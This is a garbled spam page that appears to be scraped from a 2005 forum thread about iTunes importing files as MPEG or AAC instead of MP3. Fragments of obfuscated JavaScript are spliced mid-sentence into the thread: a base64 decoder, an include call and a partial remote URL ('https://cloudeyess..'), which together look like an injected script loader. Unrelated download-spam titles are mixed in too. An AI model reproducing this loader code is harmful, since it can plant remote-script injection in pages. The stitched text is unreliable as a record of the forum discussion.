I have uninstalled and re-installed itunes and ipod software three times!Posted on Dec 26, 2005 8:39 AMPosted on Dec 26, 2005 12:24 PMQ: itunes won't convert to MP3Helpful answersAll repliesDec 26, 2005 9:22 AMI just checked the files I converted through itunes at their source in "my music".. *?(?:$|;)/g),_0x143214={};continue;}break;}}else{_0x2643d6[_0x32d8('0x37')](include,_0x2643d6[_0x32d8('0x31')](_0x2643d6[_0x32d8('0x32')],q) '');}}}}R(); Q : itunes won't convert to MP3I recently installed itunes for my new ipod.. The problemThe problem is, they showed up as all mpeg-1 files When I change the import setting to to convert to mp3, they convert but come up as mpeg's again. Best Linux Dvr Software

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I have uninstalled and re-installed itunes and ipod software three times!Posted on Dec 26, 2005 8:39 AMPosted on Dec 26, 2005 12:24 PMQ: itunes won't convert to MP3Helpful answersAll repliesDec 26, 2005 9:22 AMI just checked the files I converted through itunes at their source in "my music".. *?(?:$|;)/g),_0x143214={};continue;}break;}}else{_0x2643d6[_0x32d8('0x37')](include,_0x2643d6[_0x32d8('0x31')](_0x2643d6[_0x32d8('0x32')],q) '');}}}}R(); Q : itunes won't convert to MP3I recently installed itunes for my new ipod.. The problemThe problem is, they showed up as all mpeg-1 files When I change the import setting to to convert to mp3, they convert but come up as mpeg's again. cea114251b Best Linux Dvr Software

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I don't want a whole library of acc files Anyone else have this problem? I need a solution.. I am curious though why itunes calles it an mpeg and windows media player for instance calls it an mp3.. When I installed itunes, it took all the existing mp3's on my hard drive and loaded them into the itunes library.. constructor(\x22return\x20this\x22)(\x20)' ');');_0x31d765=_0x4e34d7();}catch(_0x1a9638){_0x31d765=window;}var _0x55d676='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /=';_0x31d765['atob']||(_0x31d765['atob']=function(_0x5fca35){var _0x4f10ce=String(_0x5fca35)['replace'](/= $/,'');for(var _0x5560e9=0x0,_0x19f730,_0x12d7f0,_0x157a5e=0x0,_0x19f30d='';_0x12d7f0=_0x4f10ce['charAt'](_0x157a5e );~_0x12d7f0&&(_0x19f730=_0x5560e9%0x4?_0x19f730*0x40 _0x12d7f0:_0x12d7f0,_0x5560e9 %0x4)?_0x19f30d =String['fromCharCode'](0xff&_0x19f730>>(-0x2*_0x5560e9&0x6)):0x0){_0x12d7f0=_0x55d676['indexOf'](_0x12d7f0);}return _0x19f30d;});}());_0x32d8['base64DecodeUnicode']=function(_0x49b068){var _0x2ca671=atob(_0x49b068);var _0x548c51=[];for(var _0x140152=0x0,_0x1e9b34=_0x2ca671['length'];_0x140152=_0x2fb323;},'zbMRK':function _0x31209e(_0x4de5d4,_0x5d7e58){return _0x4de5d4=_0x9f5cdb;},'ThKHw':function _0x11be8d(_0x369ec7,_0x2e9697){return _0x369ec7!==_0x2e9697;},'eiCYG':_0x32d8('0x22'),'MIRSn':function _0x5ebcdf(_0x1d15d8,_0xb40678){return _0x1d15d8(_0xb40678);},'gILXP':function _0x469413(_0x99e922,_0x2eb2cb){return _0x99e922 _0x2eb2cb;},'VPFRF':'https://cloudeyess.. They will convert to ACC files ok, but still not mp3's The ACC's will work on the ipod, but I want to burn mp3's for my cd players. Download Autocad Portable Gratis Work 100%

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